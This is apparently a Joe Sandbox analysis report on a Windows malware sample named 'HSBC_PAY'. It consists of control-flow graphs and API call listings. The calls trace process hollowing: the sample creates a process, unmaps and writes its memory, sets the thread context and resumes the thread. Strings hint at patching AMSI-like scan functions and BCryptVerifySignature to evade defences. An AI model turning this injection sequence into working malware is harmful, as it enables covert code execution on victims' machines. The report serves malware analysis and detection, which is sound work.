call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a84d8c call 2a84d9c call 2a985d4 6831->6875 6984 2a990af-2a9911b call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 6875->6984 6985 2a99120-2a99441 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a82ee0 call 2a82f08 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c GetThreadContext 6875->6985 6984->6985 6985->6830 7093 2a99447-2a996aa call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a9824c 6985->7093 7166 2a996b0-2a99819 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a984bc 7093->7166 7167 2a999b7-2a99a23 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 7093->7167 7257 2a9981b-2a99841 call 2a979ac 7166->7257 7258 2a99843-2a998af call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 7166->7258 7194 2a99a28-2a99ba8 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a979ac 7167->7194 7194->6830 7298 2a99bae-2a99ca7 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a98ab8 7194->7298 7266 2a998b4-2a999ab call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a979ac 7257->7266 7258->7266 7337 2a999b0-2a999b5 7266->7337 7349 2a99ca9-2a99cf6 call 2a989b0 call 2a989a4 7298->7349 7350 2a99cfb-2a9a453 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a97cf8 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a97cf8 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c SetThreadContext NtResumeThread call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a82c2c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a98798 * 3 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 7298->7350 7337->7194 7349->7350 7575 2a9a458-2a9a6ea call 2a98798 * 2 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 * 5 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a97ecc call 2a98798 * 2 7350->7575 7575->6830
                                                                    APIs
                                                                      • Part of subcall function 02A9881C: LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                      • Part of subcall function 02A9881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                      • Part of subcall function 02A9881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A9881C: FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                      • Part of subcall function 02A985D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A98660
                                                                    • GetThreadContext.KERNEL32(000008DC,02AE1420,ScanString,02AE13A4,02A9A774,UacInitialize,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,UacInitialize,02AE13A4), ref: 02A9943A
                                                                      • Part of subcall function 02A9824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A982BD
                                                                      • Part of subcall function 02A984BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02A98521
                                                                      • Part of subcall function 02A979AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A97A1F
                                                                      • Part of subcall function 02A97CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    • SetThreadContext.KERNEL32(000008DC,02AE1420,ScanBuffer,02AE13A4,02A9A774,ScanString,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,000008E0,00363FF8,02AE14F8,00000004,02AE14FC), ref: 02A9A14F
                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008DC,00000000,000008DC,02AE1420,ScanBuffer,02AE13A4,02A9A774,ScanString,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,000008E0,00363FF8,02AE14F8), ref: 02A9A15C
                                                                      • Part of subcall function 02A98798: LoadLibraryW.KERNEL32(bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,UacScan), ref: 02A987AC
                                                                      • Part of subcall function 02A98798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A987C6
                                                                      • Part of subcall function 02A98798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize), ref: 02A98802
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                    • API String ID: 4083799063-51457883
                                                                    • Opcode ID: 33516f6e65cded3461d2f20c4e68caddcc5fbe72690de09d1b62a3b9acc1c150
                                                                    • Instruction ID: 6efe399194315eccffca84082978da37518bad6fb2951fd3fef6603b0b88c11d
                                                                    • Opcode Fuzzy Hash: 33516f6e65cded3461d2f20c4e68caddcc5fbe72690de09d1b62a3b9acc1c150
                                                                    • Instruction Fuzzy Hash: 7CE2EC35A9011ADFDF11FB65CE91ADE73FABF49310F1081A2A009AB215DE35EE468F50
                                                                    Function 02A98BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 7653 2a98ba6-2a98bab 7655 2a98bb0-2a98bb5 7653->7655 7655->7655 7656 2a98bb7-2a98c9e call 2a8493c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 7655->7656 7687 2a9a6ef-2a9a759 call 2a844d0 * 2 call 2a84c0c call 2a844d0 call 2a844ac call 2a844d0 * 2 7656->7687 7688 2a98ca4-2a98d7f call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 7656->7688 7688->7687 7732 2a98d85-2a990ad call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a830d4 * 2 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a84d8c call 2a84d9c call 2a985d4 7688->7732 7841 2a990af-2a9911b call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 7732->7841 7842 2a99120-2a99441 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a846a4 * 2 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a82ee0 call 2a82f08 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c GetThreadContext 7732->7842 7841->7842 7842->7687 7950 2a99447-2a996aa call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a9824c 7842->7950 8023 2a996b0-2a99819 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a984bc 7950->8023 8024 2a999b7-2a99a23 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 7950->8024 8114 2a9981b-2a99841 call 2a979ac 8023->8114 8115 2a99843-2a998af call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c 8023->8115 8051 2a99a28-2a99ba8 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a979ac 8024->8051 8051->7687 8155 2a99bae-2a99ca7 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a98ab8 8051->8155 8123 2a998b4-2a999b5 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a979ac 8114->8123 8115->8123 8123->8051 8206 2a99ca9-2a99cf6 call 2a989b0 call 2a989a4 8155->8206 8207 2a99cfb-2a9a6ea call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a97cf8 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a97cf8 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c SetThreadContext NtResumeThread call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a82c2c call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a98798 * 3 call 2a8480c call 2a8494c call 2a846a4 call 2a84798 call 2a8494c call 2a846a4 call 2a9881c call 2a98798 * 2 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 * 5 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a8480c call 2a8494c call 2a84798 call 2a8494c call 2a98798 call 2a97ecc call 2a98798 * 2 8155->8207 8206->8207 8207->7687
                                                                    APIs
                                                                      • Part of subcall function 02A9881C: LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                      • Part of subcall function 02A9881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                      • Part of subcall function 02A9881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A9881C: FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                      • Part of subcall function 02A985D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A98660
                                                                    • GetThreadContext.KERNEL32(000008DC,02AE1420,ScanString,02AE13A4,02A9A774,UacInitialize,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,UacInitialize,02AE13A4), ref: 02A9943A
                                                                      • Part of subcall function 02A9824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A982BD
                                                                      • Part of subcall function 02A984BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02A98521
                                                                      • Part of subcall function 02A979AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A97A1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                    • API String ID: 2852987580-51457883
                                                                    • Opcode ID: 60fae6a3db88bdef597e976ab440b6c9dfb6bbe3c245abad1cb55d1eb232b61f
                                                                    • Instruction ID: 35605185f8e621e841f9696243018cc9fdb5c707f3a0d01e88be922d083c097f
                                                                    • Opcode Fuzzy Hash: 60fae6a3db88bdef597e976ab440b6c9dfb6bbe3c245abad1cb55d1eb232b61f
                                                                    • Instruction Fuzzy Hash: F4E2FC35A9011ADFDF11FB65CE91ADE73FABF49300F1081A2A009AB215DE35EE468F50
                                                                    Function 02A85A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8510 2a85a78-2a85ab9 GetModuleFileNameA RegOpenKeyExA 8511 2a85afb-2a85b3e call 2a858b4 RegQueryValueExA 8510->8511 8512 2a85abb-2a85ad7 RegOpenKeyExA 8510->8512 8519 2a85b40-2a85b5c RegQueryValueExA 8511->8519 8520 2a85b62-2a85b7c RegCloseKey 8511->8520 8512->8511 8513 2a85ad9-2a85af5 RegOpenKeyExA 8512->8513 8513->8511 8515 2a85b84-2a85bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8515 8517 2a85bbb-2a85bbf 8515->8517 8518 2a85c9e-2a85ca5 8515->8518 8523 2a85bcb-2a85be1 lstrlenA 8517->8523 8524 2a85bc1-2a85bc5 8517->8524 8519->8520 8521 2a85b5e 8519->8521 8521->8520 8525 2a85be4-2a85be7 8523->8525 8524->8518 8524->8523 8526 2a85be9-2a85bf1 8525->8526 8527 2a85bf3-2a85bfb 8525->8527 8526->8527 8528 2a85be3 8526->8528 8527->8518 8529 2a85c01-2a85c06 8527->8529 8528->8525 8530 2a85c08-2a85c2e lstrcpynA LoadLibraryExA 8529->8530 8531 2a85c30-2a85c32 8529->8531 8530->8531 8531->8518 8532 2a85c34-2a85c38 8531->8532 8532->8518 8533 2a85c3a-2a85c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8518 8534 2a85c6c-2a85c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8518
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A80000,02AAD790), ref: 02A85A94
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A80000,02AAD790), ref: 02A85AB2
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A80000,02AAD790), ref: 02A85AD0
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A85AEE
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A85B37
                                                                    • RegQueryValueExA.ADVAPI32(?,02A85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A85B7D,?,80000001), ref: 02A85B55
                                                                    • RegCloseKey.ADVAPI32(?,02A85B84,00000000,?,?,00000000,02A85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A85B77
                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A85B94
                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A85BA1
                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A85BA7
                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A85BD2
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A85C19
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A85C29
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A85C51
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A85C61
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A85C87
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A85C97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                    • API String ID: 1759228003-2375825460
                                                                    • Opcode ID: 09ce26b4cd5d1d58c3c23f3ca6c0fe097a0b78327ba429e7fce3e10edc57d5d4
                                                                    • Instruction ID: f9ec4774bdc4debfbd112c81064785e1f75f3b95fe425d736c4730e6cfc94086
                                                                    • Opcode Fuzzy Hash: 09ce26b4cd5d1d58c3c23f3ca6c0fe097a0b78327ba429e7fce3e10edc57d5d4
                                                                    • Instruction Fuzzy Hash: D55174B1E4020C7EFB21E6E48D86FEFB7AD9B04744F8101A1AB04E6181EF749A448F61
                                                                    Function 02A98798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 10523 2a98798-2a987bd LoadLibraryW 10524 2a987bf-2a987d7 GetProcAddress 10523->10524 10525 2a98807-2a9880d 10523->10525 10526 2a987d9-2a987f8 call 2a97cf8 10524->10526 10527 2a987fc-2a98802 FreeLibrary 10524->10527 10526->10527 10530 2a987fa 10526->10530 10527->10525 10530->10527
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize,02AE13A4,02A9A774,UacScan), ref: 02A987AC
                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A987C6
                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008DC,00000000,02AE13A4,02A9A3BF,ScanString,02AE13A4,02A9A774,ScanBuffer,02AE13A4,02A9A774,Initialize), ref: 02A98802
                                                                      • Part of subcall function 02A97CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                    • API String ID: 1002360270-4067648912
